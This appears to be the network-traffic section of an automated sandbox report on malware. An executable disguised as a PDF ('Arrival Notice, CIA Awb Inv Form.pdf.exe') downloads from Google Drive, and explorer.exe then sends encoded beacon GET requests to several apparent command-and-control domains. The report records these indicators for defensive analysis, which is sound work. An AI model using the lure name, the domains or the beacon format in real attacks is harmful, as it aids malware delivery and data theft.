                                                                                                              Nov 24, 2021 15:07:32.700678110 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.700715065 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.700860023 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.701217890 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.701477051 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.701523066 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.701724052 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.701955080 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.702115059 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.702147007 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.702341080 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.702716112 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.702929020 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.702975988 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.703172922 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.703469038 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.703685045 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.703732014 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.703931093 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.704165936 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.704381943 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.704428911 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.704649925 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.704902887 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.705049038 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.705080986 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.705234051 CET49806443192.168.11.20142.250.186.97
                                                                                                              Nov 24, 2021 15:07:32.705646038 CET44349806142.250.186.97192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.705842018 CET49806443192.168.11.20142.250.186.97

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 24, 2021 15:07:31.576106071 CET5629353192.168.11.201.1.1.1
                                                                                                              Nov 24, 2021 15:07:31.585949898 CET53562931.1.1.1192.168.11.20
                                                                                                              Nov 24, 2021 15:07:32.394236088 CET5378753192.168.11.201.1.1.1
                                                                                                              Nov 24, 2021 15:07:32.435465097 CET53537871.1.1.1192.168.11.20
                                                                                                              Nov 24, 2021 15:08:31.430624008 CET5709353192.168.11.201.1.1.1
                                                                                                              Nov 24, 2021 15:08:31.460340977 CET53570931.1.1.1192.168.11.20
                                                                                                              Nov 24, 2021 15:08:51.672981977 CET5544753192.168.11.201.1.1.1
                                                                                                              Nov 24, 2021 15:08:51.859122038 CET53554471.1.1.1192.168.11.20
                                                                                                              Nov 24, 2021 15:09:12.012233973 CET5758953192.168.11.201.1.1.1
                                                                                                              Nov 24, 2021 15:09:12.029232979 CET53575891.1.1.1192.168.11.20
                                                                                                              Nov 24, 2021 15:09:32.179552078 CET5895753192.168.11.201.1.1.1
                                                                                                              Nov 24, 2021 15:09:33.194725037 CET5895753192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:09:33.834431887 CET53589579.9.9.9192.168.11.20
                                                                                                              Nov 24, 2021 15:09:33.889725924 CET53589571.1.1.1192.168.11.20
                                                                                                              Nov 24, 2021 15:09:52.737596035 CET5974453192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:09:52.870865107 CET53597449.9.9.9192.168.11.20
                                                                                                              Nov 24, 2021 15:10:33.416152000 CET6048053192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:10:33.523464918 CET53604809.9.9.9192.168.11.20
                                                                                                              Nov 24, 2021 15:10:53.849569082 CET5963553192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:10:54.092525959 CET53596359.9.9.9192.168.11.20
                                                                                                              Nov 24, 2021 15:11:14.578834057 CET5967653192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:11:15.010298014 CET53596769.9.9.9192.168.11.20
                                                                                                              Nov 24, 2021 15:11:15.010687113 CET5967653192.168.11.201.1.1.1
                                                                                                              Nov 24, 2021 15:11:16.015578985 CET5967653192.168.11.201.1.1.1
                                                                                                              Nov 24, 2021 15:11:16.060709000 CET53596761.1.1.1192.168.11.20
                                                                                                              Nov 24, 2021 15:11:16.060782909 CET53596761.1.1.1192.168.11.20
                                                                                                              Nov 24, 2021 15:11:36.198964119 CET5683653192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:11:36.566768885 CET53568369.9.9.9192.168.11.20
                                                                                                              Nov 24, 2021 15:11:54.882345915 CET5315953192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:11:54.886133909 CET53531599.9.9.9192.168.11.20
                                                                                                              Nov 24, 2021 15:12:17.049396992 CET5712053192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:12:17.348529100 CET53571209.9.9.9192.168.11.20
                                                                                                              Nov 24, 2021 15:12:35.795206070 CET6360053192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:12:36.064073086 CET53636009.9.9.9192.168.11.20
                                                                                                              Nov 24, 2021 15:12:58.243678093 CET5263053192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:12:58.254039049 CET53526309.9.9.9192.168.11.20
                                                                                                              Nov 24, 2021 15:13:18.395317078 CET5339853192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:13:18.859294891 CET53533989.9.9.9192.168.11.20
                                                                                                              Nov 24, 2021 15:13:37.360068083 CET5605753192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:13:37.450122118 CET53560579.9.9.9192.168.11.20
                                                                                                              Nov 24, 2021 15:14:11.055471897 CET5929153192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:14:11.059653997 CET53592919.9.9.9192.168.11.20
                                                                                                              Nov 24, 2021 15:14:13.079699039 CET5015053192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:14:13.205045938 CET53501509.9.9.9192.168.11.20
                                                                                                              Nov 24, 2021 15:14:33.909863949 CET6520553192.168.11.209.9.9.9
                                                                                                              Nov 24, 2021 15:14:33.995456934 CET53652059.9.9.9192.168.11.20

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Nov 24, 2021 15:07:31.576106071 CET192.168.11.201.1.1.10x11a2Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:07:32.394236088 CET192.168.11.201.1.1.10xf2fdStandard query (0)doc-14-5s-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:08:31.430624008 CET192.168.11.201.1.1.10xbdecStandard query (0)www.izivente.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:08:51.672981977 CET192.168.11.201.1.1.10x816dStandard query (0)www.federal-funds-deposit.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:09:12.012233973 CET192.168.11.201.1.1.10x2498Standard query (0)www.safety1-venture.usA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:09:32.179552078 CET192.168.11.201.1.1.10x2489Standard query (0)www.musee-radix-hairsalon.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:09:33.194725037 CET192.168.11.209.9.9.90x2489Standard query (0)www.musee-radix-hairsalon.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:09:52.737596035 CET192.168.11.209.9.9.90x1d38Standard query (0)www.teslafreesuperchargermiles.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:10:33.416152000 CET192.168.11.209.9.9.90x9270Standard query (0)www.mvsteals.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:10:53.849569082 CET192.168.11.209.9.9.90xd418Standard query (0)www.thaicharuen.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:11:14.578834057 CET192.168.11.209.9.9.90x63f9Standard query (0)www.eggchanceapple.topA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:11:15.010687113 CET192.168.11.201.1.1.10x63f9Standard query (0)www.eggchanceapple.topA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:11:16.015578985 CET192.168.11.201.1.1.10x63f9Standard query (0)www.eggchanceapple.topA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:11:36.198964119 CET192.168.11.209.9.9.90x8cfStandard query (0)www.morningstarapparel.spaceA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:11:54.882345915 CET192.168.11.209.9.9.90x55cfStandard query (0)www.facebook-meta-morphosis.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:12:17.049396992 CET192.168.11.209.9.9.90x4cf5Standard query (0)www.soarlikeaneagle.siteA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:12:35.795206070 CET192.168.11.209.9.9.90x1950Standard query (0)www.evaccines.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:12:58.243678093 CET192.168.11.209.9.9.90xb3Standard query (0)www.bncmobile.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:13:18.395317078 CET192.168.11.209.9.9.90xfc85Standard query (0)www.celsb.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:13:37.360068083 CET192.168.11.209.9.9.90xac31Standard query (0)www.papllc.bizA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:14:11.055471897 CET192.168.11.209.9.9.90xffdfStandard query (0)www.bncmobile.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:14:13.079699039 CET192.168.11.209.9.9.90xe8c0Standard query (0)www.4mtechmachines.comA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:14:33.909863949 CET192.168.11.209.9.9.90x5ef3Standard query (0)www.hara.cloudA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Nov 24, 2021 15:07:31.585949898 CET1.1.1.1192.168.11.200x11a2No error (0)drive.google.com142.250.185.110A (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:07:32.435465097 CET1.1.1.1192.168.11.200xf2fdNo error (0)doc-14-5s-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Nov 24, 2021 15:07:32.435465097 CET1.1.1.1192.168.11.200xf2fdNo error (0)googlehosted.l.googleusercontent.com142.250.186.97A (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:08:31.460340977 CET1.1.1.1192.168.11.200xbdecNo error (0)www.izivente.com64.190.62.111A (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:08:51.859122038 CET1.1.1.1192.168.11.200x816dName error (3)www.federal-funds-deposit.comnonenoneA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:09:12.029232979 CET1.1.1.1192.168.11.200x2498Name error (3)www.safety1-venture.usnonenoneA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:09:33.834431887 CET9.9.9.9192.168.11.200x2489No error (0)www.musee-radix-hairsalon.com183.181.99.12A (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:09:33.889725924 CET1.1.1.1192.168.11.200x2489No error (0)www.musee-radix-hairsalon.com183.181.99.12A (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:09:52.870865107 CET9.9.9.9192.168.11.200x1d38No error (0)www.teslafreesuperchargermiles.comteslafreesuperchargermiles.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Nov 24, 2021 15:09:52.870865107 CET9.9.9.9192.168.11.200x1d38No error (0)teslafreesuperchargermiles.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:10:33.523464918 CET9.9.9.9192.168.11.200x9270No error (0)www.mvsteals.commvsteals.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Nov 24, 2021 15:10:33.523464918 CET9.9.9.9192.168.11.200x9270No error (0)mvsteals.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:10:54.092525959 CET9.9.9.9192.168.11.200xd418No error (0)www.thaicharuen.com107.178.157.225A (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:11:15.010298014 CET9.9.9.9192.168.11.200x63f9Server failure (2)www.eggchanceapple.topnonenoneA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:11:16.060709000 CET1.1.1.1192.168.11.200x63f9Server failure (2)www.eggchanceapple.topnonenoneA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:11:16.060782909 CET1.1.1.1192.168.11.200x63f9Server failure (2)www.eggchanceapple.topnonenoneA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:11:36.566768885 CET9.9.9.9192.168.11.200x8cfNo error (0)www.morningstarapparel.spacesites.teespring.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Nov 24, 2021 15:11:36.566768885 CET9.9.9.9192.168.11.200x8cfNo error (0)sites.teespring.comteespring.netlifyglobalcdn.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Nov 24, 2021 15:11:36.566768885 CET9.9.9.9192.168.11.200x8cfNo error (0)teespring.netlifyglobalcdn.com35.198.112.85A (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:11:36.566768885 CET9.9.9.9192.168.11.200x8cfNo error (0)teespring.netlifyglobalcdn.com52.58.153.27A (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:11:54.886133909 CET9.9.9.9192.168.11.200x55cfName error (3)www.facebook-meta-morphosis.comnonenoneA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:12:17.348529100 CET9.9.9.9192.168.11.200x4cf5No error (0)www.soarlikeaneagle.sitesoarlikeaneagle.siteCNAME (Canonical name)IN (0x0001)
                                                                                                              Nov 24, 2021 15:12:17.348529100 CET9.9.9.9192.168.11.200x4cf5No error (0)soarlikeaneagle.site70.40.220.123A (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:12:36.064073086 CET9.9.9.9192.168.11.200x1950No error (0)www.evaccines.com3.64.163.50A (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:12:58.254039049 CET9.9.9.9192.168.11.200xb3Name error (3)www.bncmobile.comnonenoneA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:13:18.859294891 CET9.9.9.9192.168.11.200xfc85No error (0)www.celsb.com154.94.229.8A (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:13:37.450122118 CET9.9.9.9192.168.11.200xac31Name error (3)www.papllc.biznonenoneA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:14:11.059653997 CET9.9.9.9192.168.11.200xffdfName error (3)www.bncmobile.comnonenoneA (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:14:13.205045938 CET9.9.9.9192.168.11.200xe8c0No error (0)www.4mtechmachines.com4mtechmachines.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Nov 24, 2021 15:14:13.205045938 CET9.9.9.9192.168.11.200xe8c0No error (0)4mtechmachines.com184.168.98.97A (IP address)IN (0x0001)
                                                                                                              Nov 24, 2021 15:14:33.995456934 CET9.9.9.9192.168.11.200x5ef3No error (0)www.hara.cloudhara.cloudCNAME (Canonical name)IN (0x0001)
                                                                                                              Nov 24, 2021 15:14:33.995456934 CET9.9.9.9192.168.11.200x5ef3No error (0)hara.cloud34.102.136.180A (IP address)IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • drive.google.com
                                                                                                              • doc-14-5s-docs.googleusercontent.com
                                                                                                              • www.izivente.com
                                                                                                              • www.musee-radix-hairsalon.com
                                                                                                              • www.teslafreesuperchargermiles.com
                                                                                                              • www.mvsteals.com
                                                                                                              • www.thaicharuen.com
                                                                                                              • www.morningstarapparel.space
                                                                                                              • www.soarlikeaneagle.site
                                                                                                              • www.evaccines.com
                                                                                                              • www.celsb.com
                                                                                                              • www.4mtechmachines.com
                                                                                                              • www.hara.cloud

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.11.2049805142.250.185.110443C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe
                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              1192.168.11.2049806142.250.186.97443C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe
                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              10192.168.11.2049824154.94.229.880C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2021 15:13:19.042143106 CET473OUTGET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1
                                                                                                              Host: www.celsb.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2021 15:13:19.224543095 CET473INHTTP/1.1 200 OK
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                              X-Powered-By: Nginx
                                                                                                              Date: Wed, 24 Nov 2021 14:13:15 GMT
                                                                                                              Connection: close
                                                                                                              Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                              Data Ascii: 3


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              11192.168.11.2049826184.168.98.9780C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2021 15:14:13.467587948 CET486OUTGET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1
                                                                                                              Host: www.4mtechmachines.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2021 15:14:13.770452976 CET486INHTTP/1.1 301 Moved Permanently
                                                                                                              Date: Wed, 24 Nov 2021 14:14:13 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.4.25
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              X-Redirect-By: WordPress
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Location: http://4mtechmachines.com/s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp
                                                                                                              Content-Length: 0
                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              12192.168.11.204982734.102.136.18080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2021 15:14:34.005657911 CET487OUTGET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1
                                                                                                              Host: www.hara.cloud
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2021 15:14:34.176235914 CET488INHTTP/1.1 403 Forbidden
                                                                                                              Server: openresty
                                                                                                              Date: Wed, 24 Nov 2021 14:14:34 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 275
                                                                                                              ETag: "61951b77-113"
                                                                                                              Via: 1.1 google
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              2192.168.11.204981064.190.62.11180C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2021 15:08:31.472445011 CET414OUTGET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1
                                                                                                              Host: www.izivente.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2021 15:08:31.512696981 CET415INHTTP/1.1 302 Found
                                                                                                              date: Wed, 24 Nov 2021 14:08:31 GMT
                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                              content-length: 0
                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_gk1FjG1Y57VvIG87+WRL2HOiu2y21MjA99GeT6pOEitNR09XLBGEOJtaxdqUQeHWa27wZf2qNMgXs/9+/N20Qw==
                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                              pragma: no-cache
                                                                                                              last-modified: Wed, 24 Nov 2021 14:08:31 GMT
                                                                                                              location: https://sedo.com/search/details/?partnerid=324561&language=e&domain=izivente.com&origin=sales_lander_5&utm_medium=Parking&utm_campaign=offerpage
                                                                                                              x-cache-miss-from: parking-7bcb4688fc-j7978
                                                                                                              server: NginX
                                                                                                              connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              3192.168.11.2049814183.181.99.1280C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2021 15:09:34.156372070 CET442OUTGET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1
                                                                                                              Host: www.musee-radix-hairsalon.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2021 15:09:34.611287117 CET443INHTTP/1.1 301 Moved Permanently
                                                                                                              Server: nginx
                                                                                                              Date: Wed, 24 Nov 2021 14:09:34 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Content-Length: 0
                                                                                                              Connection: close
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              X-Redirect-By: WordPress
                                                                                                              Location: https://www.musee-radix-hairsalon.com/s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              4192.168.11.204981634.102.136.18080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2021 15:09:52.881081104 CET450OUTGET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1
                                                                                                              Host: www.teslafreesuperchargermiles.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2021 15:09:53.115041971 CET450INHTTP/1.1 403 Forbidden
                                                                                                              Server: openresty
                                                                                                              Date: Wed, 24 Nov 2021 14:09:53 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 275
                                                                                                              ETag: "6197bde3-113"
                                                                                                              Via: 1.1 google
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              5192.168.11.204981834.102.136.18080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2021 15:10:33.535449982 CET458OUTGET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1
                                                                                                              Host: www.mvsteals.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2021 15:10:33.708120108 CET459INHTTP/1.1 403 Forbidden
                                                                                                              Server: openresty
                                                                                                              Date: Wed, 24 Nov 2021 14:10:33 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 275
                                                                                                              ETag: "618be74a-113"
                                                                                                              Via: 1.1 google
                                                                                                              Connection: close
